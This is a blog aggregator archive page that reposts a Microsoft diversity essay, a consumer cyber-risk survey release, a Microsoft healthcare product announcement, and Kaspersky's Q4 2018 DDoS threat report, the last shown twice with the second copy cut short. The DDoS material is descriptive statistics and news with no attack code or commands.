Category Archives: Featured

Black History Month: A time to lift each other up

As a child of “First to’s” (First African-American to command the U.S. Army Old Guard, First African-American to be selected National Elementary School Principal of the Year by President Bill Clinton), my family is deeply steeped in the history of African-American culture and civil rights in the United States, emanating from northern cities (Philadelphia, Pa. and Gary, Ind.) and the deep south (Hayneville, Ala.). I have been raised with a belief in the verse that “to whom much is given, much is required,” and a commitment to give back to our society, honoring those who paved a path forward for us.

When I look around our country today, I am so pleased to see how diversity and inclusion have moved from a concept to an expectation, embedded in every industry and sector of our society. I see leaders speaking up and actively listening to the feedback on what it takes to create diverse and inclusive environments. Mostly, I see regular citizens showing up, rediscovering their voice, sharing their stories, and demanding inclusion and equality – not just for people of color, but for groups of all kinds.

Every February during Black History Month, a 28-day window provides an opportunity for our nation, our company, and each of us to pause and take stock of the condition and progress of Black people and other minority populations. We can celebrate the achievements and contributions of so many and, at the same time, lament the increase in violence and hate crimes, inflammatory discourse in our political arena and sense of increasing polarization across our country.

At Microsoft, we have made the long-term commitment to build and sustain a culture that fosters an inclusive working environment, which will enable our employees to do their best work and serve the diverse needs of our customers around the world. We also are committed to engaging in and advancing diversity and inclusion conversations in communities where we believe we can help empower people.

Black History Month presents us with an opportunity to engage in diversity and inclusion dialogues across all minority groups.

  • At Microsoft, we kicked off the month with our Blacks at Microsoft (BAM) chapter ringing the Nasdaq bell on Wall Street for the second consecutive year. As a direct result of the impact our team had last year, Nasdaq has created its own employee network called GLOBE – Global Link of Black Employees.
  • Next week, I will share the stage with civil rights activist, Reverend Jesse Jackson, at the Wall Street Project, which strives to ensure equal opportunities for culturally diverse employees, entrepreneurs and consumers.
  • Reshma Saujani, who founded Girls Who Code with the single mission of closing the gender gap in technology, will be speaking with Microsoft employees later this month.
  • We celebrate the passionate young gamers who demonstrated to everyone, that a level playing field is possible with the help of their friends, family and adaptive technology.
  • At the upcoming BAM conference, we will recognize the pioneers who started the affinity group 30 years ago – the first employee group of its kind.

I count myself incredibly fortunate to work at a company that embodies many of the principles my parents instilled in me, which have stood the test of time as we continue to engage in the diversity and inclusion dialogue: set the bar high and exceed it, approach the world with a service mentality and, above all, lift each other up.

The post Black History Month: A time to lift each other up appeared first on The Official Microsoft Blog.

Nearly Half Of Consumers Concerned About Cyber Risks.

Europ Assistance’s Cyber Barometer, conducted by LEXIS, exploring consumer sentiment on Cyber Security across 9 countries has found that 46% of consumers are worried about cybercrime. This number rises to 49 percent for respondents with elderly parents and 54 percent for those with children.

Nearly one third of respondents (31%) feel exposed to cyber security issues and even more so (38%) when it comes to their children’s identity. Concern is the highest in Southern Europe with Spain (47%) and Italy (39%) feeling exposed. Just over a quarter (26%) of respondents indicated that they knew someone who has been the victim of an attack against their personal data while 82 percent of respondents consider an attack against their personal data to be “very stressful,” ranking above incidents such as a car accident.

A Lack Of Digital Protection
While concern is high, the survey has also discovered that protection is often neglected. Less than one-third of those questioned said that they frequently change their passwords and digital credentials and even more alarmingly only half of consumers have anti-virus and anti-malware protection on their smartphone or tablet – a worrisome statistic considering this accounts for half of global web traffic.

Forty-five percent of respondents said they wouldn’t know how to fix their situation if their personal data was compromised and 48 percent feel that companies and institutions are not doing enough to protect their individual information.

Awareness And Willingness To Purchase Solutions Is On The Rise
Americans are more aware of identity protection solutions (65%) than Europeans (40%) but consumers are ready to take steps to protect themselves online when aware of the options. More than half of respondents (55%) indicated that they have a positive opinion of cyber and digital protection services and this number rose to 61 percent for those with children and 57 percent for those with elderly parents. Consumers are interested in Alerting Services (57%), 24/7 Assistance Services (54%), Prevention Services (47%), and Monitoring Services (48%).

Antoine Parisi, CEO of Europ Assistance: “Consumers are now more aware of threats to their personal information and while the mounting concerns they have are valid, it is our mission to protect people from any stressful situation. With digital services playing such a key role in our daily lives, we have developed a unique service to protect the identities and personal data of our customers from any type of cybercrime.”

ABOUT THE EUROP ASSISTANCE – LEXIS CYBER BAROMETER
The 2019 edition of the Cyber Barometer from Europ Assistance and LEXIS was conducted in 9 countries including the United States, Italy, France, Spain, Switzerland, Austria, Hungary, Czech Republic, and Romania. In each country, 800 consumers from ages 25-75 took part in the fifteen-minute online questionnaire tailored to each country. The survey was conducted between November and December 2018 and investigated four key topics; online activities and personal protection strategies, worries regarding web and digital activities, their valuation of a cyber and digital protection service, and their intentions to buy such a service.

ABOUT EUROP ASSISTANCE GROUP
Founded in 1963, Europ Assistance, the inventor of assistance, supports over 300 million customers in 208 countries thanks to our network of 750.000 approved providers and 35 assistance centres. Our mission is to bring people or corporates from distress to relief – anytime, anywhere. We provide roadside assistance, travel assistance and insurance, as well as personal assistance services such as the protection of the elderly, the protection of digital identity, telemedicine and the Conciergerie. The vision of our 7.530 employees is to be the most reliable care company in the world. Europ Assistance is part of the Generali Group, one of the world’s leading insurers.

The post Nearly Half Of Consumers Concerned About Cyber Risks. appeared first on IT Security Guru.

Microsoft for Healthcare: technology and collaboration for better experiences, insights and care

The healthcare industry’s leading minds are getting ready to educate, intrigue, and inspire attendees next week at the HIMSS19 conference—a leading healthcare IT event in the US. We expect to see many innovative ideas and solutions to the most prevalent and persistent challenges in modern health, and we are excited to show new technologies making a real difference in people’s lives and demonstrate Microsoft’s commitment to transforming how healthcare is experienced and delivered.

Over the last few years, we have been learning alongside industry experts and making steady progress in helping health organizations navigate complex technology transformations. We have been so pleased by the enthusiastic response of the providers, payors, software developers, device manufacturers and pharmaceutical companies we’ve been working with.

But what drives us most is the profound impact on people. As we all look for more personalized and transparent approaches for healthcare services, technology transformation will help providers deliver modern patient experiences that promote patient engagement, satisfaction, and well-being while increasing the chances of more successful treatment.

This year at HIMSS, we will talk about how Microsoft’s technology and partnerships are helping empower care teams, improve clinical and operational outcomes and advance precision healthcare, with a specific focus on putting people’s privacy at the center. To kick things off, today we’re announcing several new innovations supporting the industry’s transformation:

  • Microsoft 365 for health organizations: New capabilities in Microsoft Teams that enable healthcare teams to communicate and collaborate in a secure hub for teamwork, and ultimately improve patient care.
  • Microsoft Healthcare Bot: Now generally available, this service helps organizations create AI-powered, compliant virtual assistants and chatbots for a variety of healthcare experiences.
  • Azure API for FHIR®: A new tool to help health systems interoperate and share data in the cloud.

Empowering health organizations with secure messaging and AI-powered tools

People are at the heart of healthcare – physicians, nurses, clinicians and of course, their patients. We are committed to empowering care teams with the tools they need to deliver their best care as well as empowering people as they interact with various aspects of the healthcare system.

When it comes to secure communications, many clinicians report having to choose between convenience and compliance. Adhering to compliance has often meant having to wait for critical information at the point of care. Conversely, many clinicians have turned to consumer messaging apps that facilitate communication but can compromise security.

Microsoft is working hard to ensure convenience and compliance are no longer a zero-sum equation. Today, we are announcing new capabilities in Microsoft Teams, a secure hub for teamwork that enables secure messaging and collaboration workflows that tap the wealth of patient information housed in electronic medical records.

Enable secure workflows in Microsoft Teams: The new priority notifications feature in Teams alerts a recipient of an urgent message on their mobile and desktop devices until a response is received, every two minutes for up to 20 minutes; message delegation enables clinical staff members to delegate their messages to another recipient when they are in surgery or otherwise unavailable. We are also announcing the ability to integrate FHIR-enabled electronic health records (EHR) data with Teams. The ability to view EHR data is enabled through partnerships with leading interoperability providers, including Dapasoft, Datica, Infor Cloverleaf, Kno2 and Redox. Clinical or hospital staff can securely access patient records in the same app where they can take notes, message with other team members, and start a video meeting, all in a single place to coordinate care.

For health organizations looking to optimize operational processes or create new experiences for their people and patients, we are also announcing the Microsoft Healthcare Bot general availability.

Microsoft Healthcare Bot: The Microsoft Healthcare Bot service is now generally available after first being introduced as a research project in 2017. It is designed to empower healthcare organizations to build and deploy compliant, AI-powered virtual health assistants and chatbots, and includes important features like healthcare intelligence, medical content and terminology, and a built-in symptom checker. The Microsoft Healthcare Bot service is fully extensible to help organizations adjust the bot to solve their own business problems, and can connect to health systems, like EHRs. In addition to partners like Premera, today we are announcing bots available, or available soon, from Quest Diagnostics, Children’s Healthcare of Atlanta and Clalit Health Services.

Securely connecting data for better clinical and operational outcomes

Our bodies are a lot like complex computers, and each interaction with today’s health system creates a new data point. These data points are often spread across multiple records, with valuable insights somewhat hidden in siloes. Microsoft is committed to helping address this opportunity by developing technology that connects data and surfaces important insights at exactly the right time, with privacy and security at the core.

A better-connected healthcare system would provide clinicians with more complete profiles of their patients, researchers with more complete data to study, and individuals with more information to take ownership over their health. I hear this often from leading experts in the research and care delivery communities.

With this in mind, today we’re announcing the Azure API for FHIR, a tool to help health organizations better connect systems and harness the power of data in the cloud.

Azure API for FHIR: The Azure API for FHIR will provide a method for health systems and data to ‘talk’ – what is known as interoperability – so for example, health records can connect to collaboration tools, pharmacy systems, fitness devices and others far more seamlessly. Data and insights from this more connected system can then be served up when and where they’re needed most.

API is a term for technology that links software programs together. Similar to electrical outlets and plugs, APIs can most easily be compared to the adapters you need to use electronics while traveling in foreign countries. Though technical, its functionality is important to everyone who interacts with today’s healthcare systems, as interoperability is a foundational health technology need.

The Azure API for FHIR is available in public preview, and we have more than 25 technology partners in our early access program that can help health organizations build FHIR-enabled services today.

Advancing precision healthcare

Some of the most exciting breakthroughs at the intersection of science and technology are in precision healthcare. We all stand to gain from a health system that can precisely care for us based on our unique biology, environments and ailments. Cloud and advanced AI are the key tools that will help achieve that future.

To advance precision care, Microsoft continues to invest in a series of services and computational biology projects, including research support tools for next-generation precision healthcare, genomics, immunomics, CRISPR and cellular and molecular biologics.

For example, Microsoft Genomics, which provides accelerated sequencing and secondary analysis, enables research insights for organizations like St. Jude Children’s Research Hospital with the St. Jude Cloud, the world’s largest public repository of pediatric cancer genomics data.

Earlier this year, we published an update on our partnership with Adaptive Biotechnologies, announcing we’ve opened up our joint research to immunosequence 25,000 individuals, targeting ovarian cancer, pancreatic cancer, celiac disease, type 1 diabetes and Lyme disease.

Work also continues on several Microsoft Research projects, including intelligent scribe Project EmpowerMD, medical imaging Project InnerEye, machine reading Project Hanover and metagenomics Project Premonition. These projects are pushing the boundaries of how technology can be applied in healthcare and we are excited to see how they might be used by health organizations in the future.

Working with the experts

Improving healthcare is not a singular or silver bullet effort. Microsoft’s ambition is not to be a healthcare provider, but to enable and empower those who are doing good things for people around the world. We see strategic alliances with leaders like Walgreens Boots Alliance, Allscripts, Hill-Rom, Novarad and others leading the way, with support from our thousands of technology partners. Here are a few examples:

  • Walgreens Boots Alliance: Walgreens Boots Alliance (WBA) and Microsoft announced a strategic partnership aimed at transforming health care delivery. Our companies will combine the power of Microsoft’s cloud and AI technologies, health care investments, and retail solutions with WBA’s customer reach, convenient locations, outpatient health care services, and industry expertise with the goal of making health care delivery more personal, affordable and accessible for people around the world.
  • Veradigm: Veradigm, an Allscripts company, and Microsoft announced a collaboration focused on implementing an innovative, integrated model for clinical research, aiming to enhance clinical research design, conduct studies more efficiently and improve the research provider and participant experience.
  • Hill-Rom: Hill-Rom and Microsoft announced a collaboration to bring advanced, actionable point-of-care data and solutions to caregivers and healthcare provider organizations. Our collaboration will combine Hill-Rom’s deep clinical knowledge and streaming operational data from medical devices with Microsoft’s cloud, IoT and AI technologies to help drive enhanced patient outcomes.
  • Novarad: Novarad, a healthcare enterprise imaging company, recently obtained 510(k) clearance from the FDA for the OpenSight Augmented Reality System for Microsoft HoloLens. OpenSight received pre-operative clearance for augmented reality usage in surgical planning, giving physicians access to a new solution that can improve surgical procedures by enhancing accuracy and shortening operative times.
  • ThoughtWire: ThoughtWire, is helping save lives with its EarlyWarning application, designed to preempt and prevent patients from suffering cardiac arrest in hospitals. This solution has already reduced code blue calls, which signals a risk of cardiac arrest, by 61 percent at Hamilton Health Sciences, a medical group of seven hospitals and a cancer center. ThoughtWire will deliver the EarlyWarning app, running on Microsoft Azure, to health systems at scale.
  • Innovaccer: Innovaccer is a healthcare data activation platform company working towards solving data interoperability challenges in healthcare and helping health systems enhance their clinical and financial outcomes with a data-first approach. Innovaccer is a portfolio company of M12, Microsoft’s venture fund.

The future is bright – a more connected future to deliver better experiences, insights and care. We are looking forward to meeting many of you next week at HIMSS19 and sharing more about what we are working on. Please be sure to stop by our booth No. 2500 to see our solutions in action, and follow our HIMSS19 story on @Health_IT to learn more.

 

 

The post Microsoft for Healthcare: technology and collaboration for better experiences, insights and care appeared first on The Official Microsoft Blog.

DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which included not only Mirai clones for a change. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as in the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (for example, one of the detected samples was a SYN flood one). In October, Chalubo began to be seen more often in the wild; researchers detected versions created for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in the execution of YARN remote commands. This bot is not very complex technically, but dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What’s more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters, but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to gather these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it works fine with Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.

Another promising attack method uses the CoAP protocol approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP is based on the UDP protocol, it has inherited all the latter’s defects, which means it can be harnessed to boost DDoS attacks. Until now, this has not been a significant problem; however, experts note that during the November 2017–November 2018 period, the number of devices using CoAP increased almost 100 times, which is a major cause for concern.

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Borrowing code from this kindred service, the platform is dangerous for its simplicity, low cost, and relative power: For just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was utilized in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDOS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison — but not as yet for these incidents, but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017) (download)

The average duration of attacks in H2 grew steadily over the year: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

Distribution of attack duration by type, 2018 (download)

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients would seek out more professional implementers.

Statistics

Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

  • China still tops the leaderboard by number of DDoS attacks, but its share fell quite significantly, from 77.67% to 50.43%. The US retained second position (24.90%), and Australia came third (4.5%). The Top 10 waved goodbye to Russia and Singapore, but welcomed Brazil (2.89%) and Saudi Arabia (1.57%).
  • By geographical distribution of targets, the leaders remain China (43.26%), the US (29.14%), and Australia (5.91%). That said, China’s share fell significantly, while all other Top 10 countries increased theirs.
  • Most of the botnet-based attacks last quarter occurred in October; holiday and pre-holiday periods were calmer. In terms of weekly dynamics, attack activity rose mid-week and decreased towards the end.
  • Q4 witnessed the longest attack seen in recent years, lasting almost 16 days (329 hours). In general, the share of short attacks decreased slightly, but the fluctuations were minor.
  • The share of UDP floods increased significantly to almost a third (31.1%) of all attacks. However, SYN flooding is still leading (58.2%).
  • In connection with the rising number of Mirai C&C servers, the shares of the US (43.48%), Britain (7.88%), and the Netherlands (6.79%) increased.

Attack geography

In the last quarter of 2018, China still accounted for most DDoS attacks. However, its share was down by more than 20 p.p.: from 77.67% to 50.43%.

Meanwhile, the share of the US, which took second place, almost doubled to 24.90%. As in the previous quarter, bronze went to Australia. Its share also practically doubled: from 2.27% to 4.5%. Hong Kong’s share rose only slightly (from 1.74% to 1.84%), causing it to drop to sixth place, ceding fourth position to Brazil. The latter’s indicators had been quite modest up to now, but this quarter its share was 2.89%.

An unexpected newcomer in the ranking was Saudi Arabia, whose share climbed to 1.57%, good enough for seventh spot. This time, the Top 10 had no room for Russia and Singapore. South Korea, having ranked in the Top 3 for several years before dropping to 11th in Q3, not only failed to return to the Top 10, but fell even lower, nosediving to 25th.

The shares of the other top-tenners also increased compared with summer and early fall. The same applies to the total share of countries outside the Top 10 — it increased by more than 5 p.p., from 2.83% to 7.90%.

Distribution of DDoS attacks by country, Q3 and Q4 2018 (download)

The distribution of targets by country corresponds to the distribution pattern for number of attacks: China still leads, but its share fell by just over 27 p.p., from 70.58% to 43.26%. The US remains second, although its share grew from 17.05% to 29.14%. Third place again belongs to Australia, also with an increased share (5.9%).

Russia and South Korea, until recently considered Top 10 regulars, slipped well down — as in the rating by number of attacks, they finished 17th and 25th, respectively. They were replaced by new entrants Brazil (2.73%) in fourth place and Saudi Arabia (2.23%) in fifth. The shares of all other countries, as in the previous ranking, also rose slightly. Twofold growth was observed in the case of Canada (from 1.09% to 2.21%), whose results in the past few quarters have fluctuated around 1%, never exceeding 1.5%.

The share of the countries outside of Top 10 almost tripled: from 3.64% to 9.32%.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2018 (download)

Dynamics of the number of DDoS attacks

Most of the attack peaks occurred at the start of the quarter (October), with another small surge of activity coming in early December. Unlike last year, there were no clear-cut spikes connected to the autumn and winter holidays, rather the opposite: post-festive periods were quieter. The stormiest days were October 16 and 18, and December 4; the calmest was December 27.

Dynamics of the number of DDoS attacks in Q4 2018  (download)

Whereas Q3 attacks were distributed relatively evenly over the days of the week, in Q4 the differences were more pronounced. The quietest day was Sunday (12.02% of attacks), the most active was Thursday: 15.74% of DDoS attacks occurred mid-week. Some correlation can be seen here with the distribution of attacks by date: both weekends and holidays in the previous quarter were calmer.

Distribution of DDoS attacks by day of the week, Q3 and Q4 2018 (download)

Duration and types of DDoS attacks

The longest Q4 attack we monitored lasted a near record-breaking 329 hours (almost 14 days); for a longer attack, we have to go back to late 2015. That is approximately 1.5 times the duration of the previous quarter’s longest attack of 239 hours (about 10 days).

The total share of attacks longer than 140 hours in the previous quarter increased only slightly (+0.01 p.p.) to 0.11%. The proportion of relatively long attacks (50–139 hours) also increased, from 0.59% to 1.15%. However, the most significant rise was observed in the category of 5–9 hour attacks: from 5.49% to 9.40%.

Accordingly, the share of short attacks less than 4 hours in duration decreased slightly, to 83.34%. For comparison, in Q3 they accounted for 86.94% of all attacks.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2018 (download)

The distribution of attacks by type in the last quarter underwent a bit of a shakeup. SYN flooding remains the most common, but its share dropped from 83.20% to 58.20%. That allowed UDP flooding to increase its share to almost a third of all types of DDoS attacks (31.10%), up from the more modest 11.90% in Q3.

In third place was TCP flooding, whose share also rose — to 8.40%. The share of attacks via HTTP dropped to 2.20%. In last place again, with its share falling to 0.10%, was ICMP flooding.

Distribution of DDoS attacks by type, Q4 2018 (download)

The ratio of Windows and Linux botnets barely moved against Q3. The share of Linux botnets increased slightly, up to 97.11%. Accordingly, the share of Windows botnets dropped by the same margin (1.25 p.p.) to 2.89%.

Ratio of Windows/Linux botnet attacks, Q3 and Q4 2018 (download)

Botnet distribution geography

The US remains out in front in terms of botnet C&C server hosting, even extending its lead from 37.31% to 43.48%. Slipping to seventh, Russia (4.08%) ceded second place to Britain (7.88%). Bronze went to the Netherlands, whose share increased from 2.24% to 6.79%. Significantly, all this growth is attributable to the rising number of Mirai C&C servers.

Italy and the Czech Republic vacated the Top 10 of botnet-rich countries, while Germany (5.43%) and Romania (3.26%) moved in. China (2.72%) continues to lose ground, clinging on to tenth position in Q4.

Distribution of botnet C&C servers by country, Q4 2018 (download)

Conclusion

For the third quarter in a row, the Top 10 ratings of countries by number of attacks, targets, and botnet C&C servers continue to fluctuate. Growth in DDoS activity is strongest where previously it was relatively low, while the once-dominant countries have seen a decline. This could well be the result of successful law enforcement and other initiatives to combat botnets. Another reason could be the emergence of better communications infrastructure in regions where DDoS attacks used to be infeasible.

If the trend continues, next quarter’s Top 10 will likely feature some more new entries, and in the long run, the shares of different countries could start to even out.

Securelist: DDoS Attacks in Q4 2018

News overview

In Q4 2018, security researchers detected a number of new botnets, which included not only Mirai clones for a change. The fall saw increased activity on the part of the Chalubo bot, whose first attacks were registered in late August. Although the new malware employs snippets of Mirai code and the same persistence techniques as in the Xor.DDoS bot family, Chalubo is mostly a fresh product designed solely for DDoS attacks (for example, one of the detected samples was a SYN flood one). In October, Chalubo began to be seen more often in the wild; researchers detected versions created for different architectures (32- and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, PowerPC), which strongly suggests that the test period is over.

Also in October, details were released of the new Torii botnet, which Avast experts detected a month earlier. The botnet is aimed at a wide range of IoT devices and architectures. Its code differs significantly from Mirai — the malware is better hidden with a higher level of persistence, and thus promises to be far more dangerous. The malware collects and sends detailed information about infected devices to its C&C server, including host name and process ID, but for what purpose remains unclear. No DDoS attacks based on Torii botnets were detected, but experts believe that it’s still early days.

Another bot from last quarter, nicknamed DemonBot, caught the eye for hijacking Hadoop clusters through a vulnerability in the execution of YARN remote commands. This bot is not very complex technically, but dangerous in its choice of target: Hadoop clusters pack a major punch in terms of computing power because they are designed to handle Big Data. What’s more, being cloud-integrated, they can significantly boost DDoS attacks. Radware is currently monitoring 70 active servers that carry out up to 1 million infections per day. DemonBot is compatible not only with Hadoop clusters, but with most IoT devices, which makes it easy to re-aim at more numerous targets.

Last quarter, experts warned not only about new botnets, but new attack mechanisms, too. At the beginning of winter, for instance, it turned out that FragmentSmack was more widely deployable than previously thought. This attack exploits a vulnerability in the IP stack, which enables defective packets to be sent disguised as fragments of a larger message. The resource under attack tries to gather these packets into one, or places them in an endless queue, which takes up all its computational power and renders it incapable of handling legitimate requests. FragmentSmack was believed to be a threat only to Linux systems, but in December researchers from Finland discovered that it works fine with Windows 7, 8.1, 10, Windows Server, and 90 Cisco products.

Another promising attack method uses the CoAP protocol approved for widespread application in 2014. It is designed to facilitate communication between devices with a small amount of memory, making it ideal for the IoT. Since CoAP is based on the UDP protocol, it has inherited all the latter’s defects, which means it can be harnessed to boost DDoS attacks. Until now, this has not been a significant problem; however, experts note that during the November 2017–November 2018 period, the number of devices using CoAP increased almost 100 times, which is a major cause for concern.

Alongside new potential means for staging attacks, late 2018 saw the arrival of a new DDoS launch platform, called 0x-booter. First discovered on October 17, 2018, the service can support attacks with a capacity of up to 420 Gb/s based on just over 16,000 bots infected with Bushido IoT malware, a modified version of Mirai. Borrowing code from this kindred service, the platform is dangerous for its simplicity, low cost, and relative power: For just $20–50, anyone can use the simple interface to launch one of several types of attack against a target. According to the researchers, in the second half of October alone the service was utilized in more than 300 DDoS attacks.

It was with such resources that a powerful DDoS campaign was carried out throughout October against Japanese video game publisher Square Enix. The first wave came at the start of the month, coinciding with an attack on their French colleagues from Ubisoft (seemingly timed for the release of Assassin’s Creed Odyssey on October 4). The second wave hit a couple of weeks later. The attacks cut users off from the service for up to 20 hours.

Other than that, the end of the year was marked less by high-profile DDoS attacks than by attempts to reduce their frequency. Based on a report by cybersecurity researchers, the US Council on Foreign Relations (CFR) called for a global initiative of both public and private organizations to reduce the number of botnets.

Nor are law enforcement agencies asleep at the wheel. In October, US citizen Austin Thompson was found guilty of organizing a number of DDOS attacks in 2013–14. His victims included video game streamers as well as major game developers EA, Sony, Microsoft, and others.

In early December, British teenager George Duke-Cohan, who organized DDoS attacks against IT blogger Brian Krebs, the DEF CON convention, and government organizations in several countries, was sentenced to three years in prison — but not as yet for these incidents, but for making bomb hoax threats to numerous British schools and San Francisco Airport. Further charges could be brought against him in the US.

And around Christmas time, the FBI put a stop to 15 DDoS-as-a-Service sites, charging three suspects with running the platforms. The operation is of interest because many of the domains brought down had long escaped the eyes of the law by masquerading as stress testing sites. As the FBI uncovered, some of the services were complicit in a recent string of attacks on gaming portals.

In 2018, we recorded 13% less DDoS activity than in the previous year. A drop in the number of attacks over this period was observed in each quarter, except the third, which outstripped Q3 2017 due to an anomalously active September. The biggest decrease was seen in Q4, with the number of attacks only 70% of the 2017 figure.

&&

Quarterly comparison of the number of DDoS attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% = number of attacks in 2017) (download)

The average duration of attacks in H2 grew steadily over the year: from 95 minutes in Q1 to 218 in Q4.

The most common type of attack by a wide margin is UDP flooding, as reflected in our reports for the last few quarters. However, when comparing attacks by their duration, the situation is quite different. First place goes to HTTP floods and mixed attacks with an HTTP element — they account for around 80% of all DDoS attack activity. Conversely, the UDP attacks we observed this year rarely lasted more than 5 minutes.

&&

Distribution of attack duration by type, 2018 (download)

All this suggests that the market for unsophisticated, easy-to-organize attacks continues to shrink, as we predicted would happen. Standard DDoS attacks have been rendered almost pointless by improved anti-UDP flood protection, plus the fact that the technical resources involved are nearly always more profitably deployed for other purposes, such as cryptocurrency mining.

Many short attacks of this kind can be interpreted as simply testing the water (on the off-chance that the target is not secure). It only takes a few minutes for the cybercriminals to figure out that their tools are ineffective and call off the attack.

At the same time, more complex attacks such as HTTP floods, which require time and effort to arrange, remain popular, and their duration is on an upward curve.

These trends look set to develop further in 2019: the total number of attacks will fall amid growth in the duration, power, and impact of well-targeted offensives. A rise in professionalism is also in the cards. Given that most resources are totally unaffected by primitive attempts to disrupt their operation, DDoS attack organizers will have to raise their technical level, as their clients would seek out more professional implementers.

Statistics

Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q4 2018.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

